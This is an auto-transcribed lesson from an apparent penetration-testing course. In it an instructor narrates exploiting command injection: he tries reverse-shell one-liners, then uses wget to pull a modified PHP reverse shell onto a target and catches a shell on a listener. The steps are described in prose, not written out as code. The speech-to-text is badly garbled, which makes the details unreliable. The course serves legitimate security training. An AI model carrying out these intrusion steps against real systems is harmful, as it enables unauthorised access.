Time
14 hours 43 minutes
Difficulty
Advanced
CEU/CPE
15

Video Transcription

00:00
Hello, everybody. And welcome to episode number 44 off the penetration test in simulation module. Spock Shin,
00:09
My name is Alejandro Gonna, And I'll be instructor for today's session.
00:13
Learning operatives of this session is to understand the man steps you need to follow during a penetration testing process and apply the sickness to successfully perform a penetration test. So let's get down to business, shall we?
00:27
So, in the previous session, we learned that we could actually up, you know,
00:34
execute commands to this your l
00:39
So as you can see, you were just listing things here. Like, maybe I didn't that dash a
00:46
It will give us more options. And yeah, we'll print this additional options. So, yeah, we actually execute men's so we can go the easy way. And, you know, try to actually, uh,
00:58
throw a reversal
01:00
all in one. I know this seems like a bit of a stretch, but believe me, I have used this technique several times before. On if this doesn't work, we can always strike other waste, other commands to send us back a river Shal We saw this commands in also a previous video.
01:19
Uh, well, you know, it's called river shells.
01:22
So, yeah, you can go back and see what other commands and how we, you know, we actually learned that this could actually work, So we just introduced a p of the pork and let me just start a listener over here,
01:38
and there's just execute this to see if we actually get over. Shell is not throwing an exception, but as you can see, we're not actually going anything back. We can always try the encoded version,
01:49
which is just, you know, version that he will work in your else
01:55
s. Oh, yeah, that's that. That's something we can actually try. Let me just copy paste the commanding here.
02:01
And, you know, instead of this
02:05
is this
02:06
and you know, it didn't fail, but he didn't work either. So for example, uh,
02:14
let's see if actually piping is available. Like, for example, trying to
02:20
eliminate this
02:21
and maybe try to list Ah, common fightin, um,
02:25
location
02:28
ban hopes
02:30
been and maybe
02:31
everything that it says P y t
02:37
and yeah, it's available. You can see all the folders that contained that great iria. So maybe we can try to execute the Fightin command to actually get us a reversal. I'm just copy pasting off this, but, you know, we saw how to get this commands before in another video. So
02:54
if you have any questions of this, you can go back. Always go back in
02:59
and see if we can. You can actually get this commands by yourself. So again, just the p the port, you know, executed. And it didn't fail. But again, no. No luck. No reverse shell at all. Um,
03:14
we can always just see here. Let's let's try the, you know, encoded version A swell. Uh, this is just I know it sounds boring to you, but this is something you will have to do in your actual penetration. Testing some commands will work in some will not.
03:30
And some things, Nick, techniques will work and some will not. But don't give up. Don't give up hope, okay?
03:37
Eso piping didn't work. That's kind of a bomber. Ah, but what about Pearl? We can just check if Perlis installed.
03:46
Yeah, hit in. Salt said that. Good news. We have another try here. Uh, let me just again. Copy. Pays the Broken man, which is kind of similar to the pipe *** man But let me just copy paste that he here and actually cute it and you know it work. It seems at least not failing.
04:04
But it's not showing me any useful information. It is not certain you know for sure is not
04:11
sending you back any of river shell. You know, again, let me just try the encoded version off this command again. A lot off. We're characters, you know,
04:21
equal work.
04:24
And as I told you before, this have proved award for me before. Uh, you know, maybe I'm just using a different Maybe the encoded version I'm using. This is not working. Maybe, you know, you can use another encode encoder
04:40
and see if that works for you. You know, you have to try every everything that you can possibly think of.
04:45
Ah, but, you know, let's just randich the l s command again.
04:50
Sorry. Climate. Just copy paste in here
04:54
again.
04:58
And, as you can see there, speak. There's a PHP file in here. The one that we were using, you know, And we're listening before, eh? So that that makes me thing. If I can actually execute commands, can I actually execute like I don't know a command, you know, a
05:13
maybe a doubly get command to see Viking actually download. Ah, revert A reverse BHP fire. Let me just try it out. Don't get dash dash Help
05:28
And, yeah, they only get a sexually installed and sending me this album But all I wanted to know if actually doesn't get what's presented in, you know, in this system. So it is. So now if there's a support for doubly get and we can actually see, I actually can see Ah PHP file
05:47
in that in that location in my you know, the minutes means that I can actually drop
05:51
Ah PHP file in that case. So a CZ you can remember from from previous, from the previous beauteous again, if you have any questions about about this all that I'm using now and I'm actually mentioned we're ready side in previous beaches here can just go back if you have any. Any, Any further questions?
06:12
So, for example, let me just got this house so you can see what I'm talking about.
06:15
Um, US shirt, web shells,
06:18
um, B h b.
06:21
And we have a couple of them. Like, for example, we can just cat pee HB
06:28
reversal, and you can see that it will, you know, doesn't matter the code. But it tells us that we have to change these values in order to actually get a reversal. Obviously, this will work because that the M P H B is executed at service at the server side. So you know,
06:46
these local hose that people not work. So let me just copy that first
06:48
to my web root. So, you know, I cannot actually
06:54
get back from the victim's machine back to my web server.
06:58
So I used copy dad from you.
07:00
Uh,
07:01
c p dot
07:04
to my
07:05
Webroot directory again.
07:08
Maybe
07:10
RVs that GHB and then change cat for CP for copy and then modify Thistle reversal so I can actually change the i, p and everything.
07:25
And I go here and I changed I p back to my listener machine.
07:31
In this case, Kali
07:35
and I kicked King hopes go back and said it said Porter, 4444 And that's it. I said, And you know, they have to download this in our victim's machine. Uh, so
07:50
you know, what if I go to with the PH. B, this might not get the results. I'm looking for Cassie. It will be executed. But I needed to copy it first. So maybe I can, you know, change the extension of that. Let me just right. They were move,
08:11
too, you know, Same location.
08:18
Let me see if I did correctly
08:26
and yeah, it seems that is working. The thing is that I want to actually copy the code, not copy the PHP file. Because if I try to copy the PHP file, there might be a problem because they will be executed at the same time. So yeah, copy that. The T X T file and then just again changed x station, just as I did in dis command. So
08:46
now that I have it ready, I can just go to my web pitch
08:50
and only get that to the directory. So don't get http
08:56
my collie
08:58
and then use tripe, R B s that 60 and it didn't fail. Let me just double check that it's actually there.
09:09
Oh, no, it's not actually there. Could I actually reach it from from my machine? Let me just check it out.
09:15
Maybe you might. Might my Apache service actually down?
09:20
Yeah. It's actually down. Let me just start the service.
09:22
And this happens all the time. You guys don't worry about it if you, you know, make that those silly mistakes. It's okay if I go here back again, and if I checked it out, okay, it's working.
09:37
Uh, let me just execute this again
09:43
and raise it again and see if it's actually written in there. In there you are B s that the x t. And right now, I just have to actually again use the move, command and just, you know, change from RVs. That 62 RVs
10:01
that GHB
10:05
and it raised that and see if he's actually worked.
10:09
And your RV is that b h B s. So now that I have
10:15
beach B R reverse Shal, I can actually just start a listener. Ah, and you know,
10:20
I just I really did just show you and, you know, just go to erase all this at the end. You know, I I already uploaded. Ah, full GHB weapons
10:31
and type RVs that GHB.
10:35
And as you can see, it's actually just a slowing. Said the end. Yeah, it actually is actually executed a full traverse shell as you can see I have a full reverse shell. Now, when my something I'm the data people video.
10:52
Okay, you know, stuff like that. The point is that I have a full loud, low privilege shell that I right now I need to actually elevate privileges so I can, you know, get full control on machine,
11:07
What is performed by the command bash, Dash e. And every day, the address of the man is actually used to throw. You are reversal using bash. So maybe net car or peril of python or PHP is not presented in the victim's system. You can always use the bash, our script or command
11:26
to actually send your first show.
11:28
Ah, what is performing the command Pearl Dash B is just just to see the check out. What pearls version is installed, You know, on your system or in your victim's system, it will just show you the proper ablation that's actually installed
11:43
on this video. We learned one important steps you have to perform during your penetration testing process,
11:50
and we apply something next that will help us perform our penetration testing successfully.
11:56
Ah, you know, again, supplemental materials are Vance penetration testing hacking the world's most secure networks is a good book to you. Guys are really excellent book and looking forward in the next video, we'll cover the privilege escalation off. You know this penetration testing simulations module? We're checking right now,
12:16
so that's it for today, folks. I hope you get the video and talk to you soon.

Up Next

Offensive Penetration Testing

This is a deep course about penetration testing. In this course, you’ll learn from basic to the most advanced and modern techniques to find vulnerabilities through information gathering, create and/or use exploits and be able to escalate privileges in order to test your information systems defenses.

Instructed By

Instructor Profile Image
Alejandro Guinea
CERT Regional Director
Instructor